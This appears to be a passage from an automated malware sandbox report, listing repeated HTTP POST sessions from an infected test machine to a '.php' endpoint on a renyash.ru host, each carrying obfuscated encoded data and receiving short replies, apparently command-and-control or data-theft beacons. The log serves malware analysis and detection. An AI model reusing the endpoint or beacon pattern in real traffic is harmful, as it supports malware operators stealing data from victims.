                                                                        Dec 28, 2024 20:44:22.907387018 CET2584OUTData Raw: 56 56 5c 55 56 49 50 53 5d 5f 52 56 5a 5b 58 5d 57 5e 5f 50 54 51 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VV\UVIPS]_RVZ[X]W^_PTQUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+/1_"]+ %,;/#-9=[<49+V*#X950=<%\ ![(+
                                                                        Dec 28, 2024 20:44:23.649723053 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:23.896797895 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cjj0WNPpdC2UdYVWQMFRwXlnRpcB8Hju8LOJLyD67dzbvvkcf60%2FytmKJL7DKX1Y3Kf7M89iVi%2F6PJqOIx9kv1M0AW%2FCocxKUyXKrRFQblP3XxeNenqt1cdXqJk3Q2Wnj4uGVKfi"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b72df7542ac-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4445&min_rtt=1735&rtt_var=6071&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=62345&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        60192.168.2.449968104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:24.140518904 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:24.485507011 CET2580OUTData Raw: 53 55 59 51 53 46 50 5e 5d 5f 52 56 5a 58 58 5a 57 5f 5f 5e 54 51 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SUYQSFP^]_RVZXXZW__^TQUBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'<"!#%/,8/7-+>049'Q=</Y9#63_><%\ ![(?
                                                                        Dec 28, 2024 20:44:25.224467993 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:25.458585024 CET805INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:25 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHMQv1aFUWueQKqBW8vi%2BVMFdl4pCJYUDap53ltJ31eKo84E%2FTnokuoTTzj9PRuO8aOGguiaKRjMn2Tah5w3oHwxvE7p6pOe%2BDfauePoVovRfTeWQ2J5F6SuyZCMl7MQwmqX4zwU"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b7cbfbdde97-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6542&min_rtt=1499&rtt_var=10649&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=34887&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        61192.168.2.449973104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:25.698040962 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:26.048006058 CET2584OUTData Raw: 53 52 59 53 56 40 50 5b 5d 5f 52 56 5a 5c 58 5b 57 5c 5f 5d 54 51 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SRYSV@P[]_RVZ\X[W\_]TQUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_)/. ;'#4//4.*-,#93) :'"33[=%\ ![(7
                                                                        Dec 28, 2024 20:44:26.878330946 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:27.133018970 CET800INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzD7H7nP9yzgSiffLZs12UDGQNVf099hCCvq0lu0l8mFRptWtCu4EXVTRwcRi3kP5G6Fl0Wns9kuAz9aoDnxz7CJ8bHWB6xMzmslxq4YyVRt6pDII2Amz8PqSMI3IxvUfkbqLpjY"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b86fed62394-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10459&min_rtt=2005&rtt_var=17661&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=20964&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        62192.168.2.449978104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:27.372211933 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:27.719875097 CET2584OUTData Raw: 53 51 59 54 56 42 50 5e 5d 5f 52 56 5a 5e 58 58 57 5e 5f 58 54 53 55 46 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SQYTVBP^]_RVZ^XXW^_XTSUFR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+?!!+< ,++]#>2*=?V#94(/::#"#/^(<%\ ![(?
                                                                        Dec 28, 2024 20:44:28.738899946 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:28.750888109 CET806INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwc%2Fe8b6ueHOutuilA4XX9bn0ZsGjl0uMi0GARFye7%2FxztHKhxhox%2FWul0E5rgK%2BHl71asQiYuoRre3l5UvTTnOnFPTRLnYMdkTDalNAeM5DnnNxZvTFLWzDKonheb8h18xXoCSo"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b9129d272ab-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6566&min_rtt=1977&rtt_var=9920&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=37732&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        63192.168.2.449981104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:28.994935989 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:29.344887972 CET2580OUTData Raw: 56 52 5c 54 56 42 50 5e 5d 5f 52 56 5a 58 58 58 57 51 5f 50 54 57 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VR\TVBP^]_RVZXXXWQ_PTWUCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z?)^ ($Z#6(,8#[ X2=>$")7Q(?#Y-+"V?=%\ ![(7
                                                                        Dec 28, 2024 20:44:30.126019955 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:30.368010998 CET806INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:30 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aabH48B0yAurF4E4YSnFA2Q5mD1ujx9XshaloKwcXyM5hRiukpj6R40UdhYxXTsI%2B2H701LnJZNMTaPsGcO0Rin5b%2FNBBojppHz3nsidQiu6w1SqMQHvPflob%2FcFCpu5%2FdV95VYy"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b9b497a1a13-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4846&min_rtt=1890&rtt_var=6622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=57154&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        64192.168.2.449987104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:30.606257915 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:30.954812050 CET2584OUTData Raw: 56 5a 59 57 53 44 50 53 5d 5f 52 56 5a 5f 58 55 57 58 5f 5a 54 50 55 44 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZYWSDPS]_RVZ_XUWX_ZTPUDR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z+/%^"+Z4[,+47"]*[#W#?)/:_#\50/*<%\ ![(
                                                                        Dec 28, 2024 20:44:31.784794092 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:32.037031889 CET800INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXHkPF9yE6oQYTJyBm272ANivAJMCOwnk0AJHiFzOHhn5Qg0JQkC2cZgiKukxGuB00qLg8hfTMYWFpMwIXMuKfKLBRH%2FXoQcCCklDtOMK2yVkI86ZGnE73MpHJPAON0vkNrS6RAm"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ba5ac2fde9a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4866&min_rtt=2290&rtt_var=6011&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=63752&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        65192.168.2.449991104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:32.319562912 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:32.674146891 CET2584OUTData Raw: 56 5b 5c 56 56 46 55 5b 5d 5f 52 56 5a 5f 58 54 57 50 5f 5b 54 54 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[\VVFU[]_RVZ_XTWP_[TTUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y)/=]!;4;,, >*+-#T7)=?9:76/(,%\ ![(
                                                                        Dec 28, 2024 20:44:33.489902020 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:34.015142918 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IsvfHfZMAPQcKyo3f2g3VirRzBj%2FOmfCVo%2FLvQKqe60VxRq1vxx06LBrBDJGREd6CGqubIlCiVOClUN6vi8Kqs0JrBkcSsAXid%2BBnpIQ3Q5RlgYq96ff5GIkXZKkVDFz9gzAiHvd"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bb04a856a5e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4191&min_rtt=1766&rtt_var=5512&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=68972&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0
                                                                        Dec 28, 2024 20:44:34.015588999 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IsvfHfZMAPQcKyo3f2g3VirRzBj%2FOmfCVo%2FLvQKqe60VxRq1vxx06LBrBDJGREd6CGqubIlCiVOClUN6vi8Kqs0JrBkcSsAXid%2BBnpIQ3Q5RlgYq96ff5GIkXZKkVDFz9gzAiHvd"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bb04a856a5e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4191&min_rtt=1766&rtt_var=5512&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=68972&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        66192.168.2.449995104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:34.257792950 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:34.614145041 CET2584OUTData Raw: 56 50 59 54 56 45 55 59 5d 5f 52 56 5a 5f 58 58 57 5c 5f 5b 54 54 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPYTVEUY]_RVZ_XXW\_[TTUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'+! ;4_#?/<7X-+-#9?V)?:_?]#0>%\ ![(
                                                                        Dec 28, 2024 20:44:35.435101986 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:35.689105034 CET809INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4pY0KZl8%2B2SU7J3epBDiB3XKJihzFmiOEnlBs3QDskkVRQc%2BOyVXOjUpcSuecExlUo3DeVtoS1DVsb0kw1xwLH1b0Osjjwv1%2Bt6abN%2BvTygMe1pCie7MSpgucF0gyvzbZ2p%2Bl9I"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bbc7cc87ca8-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3527&min_rtt=1973&rtt_var=3848&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=101353&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        67192.168.2.450000104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:35.933182955 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:36.282404900 CET2580OUTData Raw: 56 5a 5c 53 56 45 50 5c 5d 5f 52 56 5a 58 58 58 57 5e 5f 5e 54 54 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZ\SVEP\]_RVZXXXW^_^TTUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y?Z26]##,[,87#&Y*.,#9/V>Y0-)(!8)%\ ![(7
                                                                        Dec 28, 2024 20:44:36.610506058 CET1236OUTData Raw: 38 09 00 07 0b 39 10 50 32 29 0e 14 0b 05 20 14 39 3c 30 29 03 1b 31 5b 34 54 3a 25 31 5f 33 2c 3a 33 18 2c 39 21 1b 1f 35 39 18 06 33 54 47 20 3b 3b 3e 27 3b 28 19 1d 3a 02 18 26 28 31 47 17 38 06 1d 0e 2e 01 06 5e 30 5f 50 2a 05 24 10 2c 35 0f
                                                                        Data Ascii: 89P2) 9<0)1[4T:%1_3,:3,9!593TG ;;>';(:&(1G8.^0_P*$,5>4>$;=8\0=2(_:<]/+.=9<0)!;;(]8 4'=7?#-401;\ 3Y 5_419**YX2\8:".(<(X1:A>83*7(7A9_98QS/%1U31 7;9P,)5'<,10:>,]$2?&
                                                                        Dec 28, 2024 20:44:37.019840956 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:37.258095026 CET807INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SwOWbygqSurDLnChlwV1h6K0Z9asJJe0TKdoJPdIY3%2BZqjrhGoYJ%2B0Lpv48fZ8R%2BU8g9nEJpMl8HhfW0q50n5W%2BfcsWQ2hGx4XcMAJSQdoUNXYj6DMd9wg2f3J3wLUc0Vf2ZqRka"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bc66ffdc40e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6964&min_rtt=1518&rtt_var=11461&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=32381&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        68192.168.2.450004104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:37.500195026 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:37.845014095 CET2584OUTData Raw: 53 51 5c 54 56 47 50 58 5d 5f 52 56 5a 5b 58 5e 57 5a 5f 5b 54 53 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SQ\TVGPX]_RVZ[X^WZ_[TSUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y+/> ;8[464;;/7*_>-#4:,)3_.#"03_),%\ ![(+
                                                                        Dec 28, 2024 20:44:38.592981100 CET25INHTTP/1.1 100 Continue
